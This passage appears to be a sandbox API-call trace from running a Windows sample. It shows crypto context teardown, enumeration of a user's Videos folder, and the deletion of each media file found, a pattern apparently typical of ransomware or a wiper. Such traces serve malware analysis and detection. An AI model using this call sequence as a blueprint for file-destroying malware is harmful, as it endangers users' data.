returned 0xd [0214.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.086] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.086] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.086] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.086] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.086] WriteFile (in: hFile=0x520, lpBuffer=0x2a72718*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72718*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0214.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.087] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0214.087] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.087] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0214.087] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.088] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.088] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.088] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.088] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.088] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.090] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab4d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0214.091] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0214.091] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.091] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.091] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.091] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.091] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.091] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.091] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.091] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.091] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.092] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.092] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.092] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.092] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.092] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.092] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.092] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.092] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.092] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.092] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.092] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.092] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0214.093] CryptReleaseContext (hProv=0xa7c6e8, dwFlags=0x0) returned 1 [0214.093] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.093] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.093] FreeLibrary (hLibModule=0x76390000) returned 1 [0214.093] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.093] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.093] CloseHandle (hObject=0x520) returned 1 [0214.094] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.094] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.094] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.094] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SpSJ7tN62PCD2h Y", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y", lpFilePart=0x8cedf4*="SpSJ7tN62PCD2h Y") returned 0x27 [0214.094] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y")) returned 0x10 [0214.094] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdff5f6d0, ftCreationTime.dwHighDateTime=0x1d5c7be, ftLastAccessTime.dwLowDateTime=0xa0e93160, ftLastAccessTime.dwHighDateTime=0x1d5d19f, ftLastWriteTime.dwLowDateTime=0xa0e93160, ftLastWriteTime.dwHighDateTime=0x1d5d19f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2078 [0214.095] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdff5f6d0, ftCreationTime.dwHighDateTime=0x1d5c7be, ftLastAccessTime.dwLowDateTime=0xa0e93160, ftLastAccessTime.dwHighDateTime=0x1d5d19f, ftLastWriteTime.dwLowDateTime=0xa0e93160, ftLastWriteTime.dwHighDateTime=0x1d5d19f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0214.095] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96b6070, ftCreationTime.dwHighDateTime=0x1d5ca64, ftLastAccessTime.dwLowDateTime=0x193333b0, ftLastAccessTime.dwHighDateTime=0x1d5d663, ftLastWriteTime.dwLowDateTime=0x193333b0, ftLastWriteTime.dwHighDateTime=0x1d5d663, nFileSizeHigh=0x0, nFileSizeLow=0xfe96, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-jXSm.avi", cAlternateFileName="")) returned 1 [0214.095] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\-jXSm.avi" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\-jxsm.avi")) returned 1 [0214.097] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a3e360, ftCreationTime.dwHighDateTime=0x1d5ca8f, ftLastAccessTime.dwLowDateTime=0x119f30, ftLastAccessTime.dwHighDateTime=0x1d5d7f2, ftLastWriteTime.dwLowDateTime=0x119f30, ftLastWriteTime.dwHighDateTime=0x1d5d7f2, nFileSizeHigh=0x0, nFileSizeLow=0x10157, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="BtfsGm_6.swf", cAlternateFileName="")) returned 1 [0214.097] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\BtfsGm_6.swf" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\btfsgm_6.swf")) returned 1 [0214.098] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e7d810, ftCreationTime.dwHighDateTime=0x1d5cbe8, ftLastAccessTime.dwLowDateTime=0x15b94210, ftLastAccessTime.dwHighDateTime=0x1d5cc45, ftLastWriteTime.dwLowDateTime=0x15b94210, ftLastWriteTime.dwHighDateTime=0x1d5cc45, nFileSizeHigh=0x0, nFileSizeLow=0x1328f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="dK29Uj7bvsWM IdJA1A.swf", cAlternateFileName="DK29UJ~1.SWF")) returned 1 [0214.098] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\dK29Uj7bvsWM IdJA1A.swf" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\dk29uj7bvswm idja1a.swf")) returned 1 [0214.098] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8e118c0, ftCreationTime.dwHighDateTime=0x1d5cd5f, ftLastAccessTime.dwLowDateTime=0x9bbd0a0, ftLastAccessTime.dwHighDateTime=0x1d5d5b8, ftLastWriteTime.dwLowDateTime=0x9bbd0a0, ftLastWriteTime.dwHighDateTime=0x1d5d5b8, nFileSizeHigh=0x0, nFileSizeLow=0x1006b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="hOpQ93UREt_gQ_.avi", cAlternateFileName="HOPQ93~1.AVI")) returned 1 [0214.098] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\hOpQ93UREt_gQ_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\hopq93uret_gq_.avi")) returned 1 [0214.100] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd634c2f0, ftCreationTime.dwHighDateTime=0x1d5c9a0, ftLastAccessTime.dwLowDateTime=0x64ca300, ftLastAccessTime.dwHighDateTime=0x1d5c7ed, ftLastWriteTime.dwLowDateTime=0x64ca300, ftLastWriteTime.dwHighDateTime=0x1d5c7ed, nFileSizeHigh=0x0, nFileSizeLow=0x10ec8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="KfYFPnzKevQW 4wSFGK.mkv", cAlternateFileName="KFYFPN~1.MKV")) returned 1 [0214.100] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\KfYFPnzKevQW 4wSFGK.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\kfyfpnzkevqw 4wsfgk.mkv")) returned 1 [0214.101] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd557f0, ftCreationTime.dwHighDateTime=0x1d5cf29, ftLastAccessTime.dwLowDateTime=0x4b18aa50, ftLastAccessTime.dwHighDateTime=0x1d5ce79, ftLastWriteTime.dwLowDateTime=0x4b18aa50, ftLastWriteTime.dwHighDateTime=0x1d5ce79, nFileSizeHigh=0x0, nFileSizeLow=0x17b76, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="opOrnh.mkv", cAlternateFileName="")) returned 1 [0214.101] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\opOrnh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\opornh.mkv")) returned 1 [0214.104] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3162a0, ftCreationTime.dwHighDateTime=0x1d5ca0a, ftLastAccessTime.dwLowDateTime=0xf871b920, ftLastAccessTime.dwHighDateTime=0x1d5d28a, ftLastWriteTime.dwLowDateTime=0xf871b920, ftLastWriteTime.dwHighDateTime=0x1d5d28a, nFileSizeHigh=0x0, nFileSizeLow=0x5a9a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="v1QXHP8XIkVjSy04.avi", cAlternateFileName="V1QXHP~1.AVI")) returned 1 [0214.104] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\v1QXHP8XIkVjSy04.avi" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\v1qxhp8xikvjsy04.avi")) returned 1 [0214.112] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7178c500, ftCreationTime.dwHighDateTime=0x1d5cc39, ftLastAccessTime.dwLowDateTime=0x27bc9590, ftLastAccessTime.dwHighDateTime=0x1d5d7c4, ftLastWriteTime.dwLowDateTime=0x27bc9590, ftLastWriteTime.dwHighDateTime=0x1d5d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="yxdcrz-yAiavu2_q.mkv", cAlternateFileName="YXDCRZ~1.MKV")) returned 1 [0214.112] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\yxdcrz-yAiavu2_q.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\yxdcrz-yaiavu2_q.mkv")) returned 1 [0214.113] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230af160, ftCreationTime.dwHighDateTime=0x1d5d303, ftLastAccessTime.dwLowDateTime=0x4eab21f0, ftLastAccessTime.dwHighDateTime=0x1d5cd9f, ftLastWriteTime.dwLowDateTime=0x4eab21f0, ftLastWriteTime.dwHighDateTime=0x1d5cd9f, nFileSizeHigh=0x0, nFileSizeLow=0xe65e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_WyA61BV8_TdgoCYACg.mp4", cAlternateFileName="_WYA61~1.MP4")) returned 1 [0214.114] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y\\_WyA61BV8_TdgoCYACg.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y\\_wya61bv8_tdgocyacg.mp4")) returned 1 [0214.115] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230af160, ftCreationTime.dwHighDateTime=0x1d5d303, ftLastAccessTime.dwLowDateTime=0x4eab21f0, ftLastAccessTime.dwHighDateTime=0x1d5cd9f, 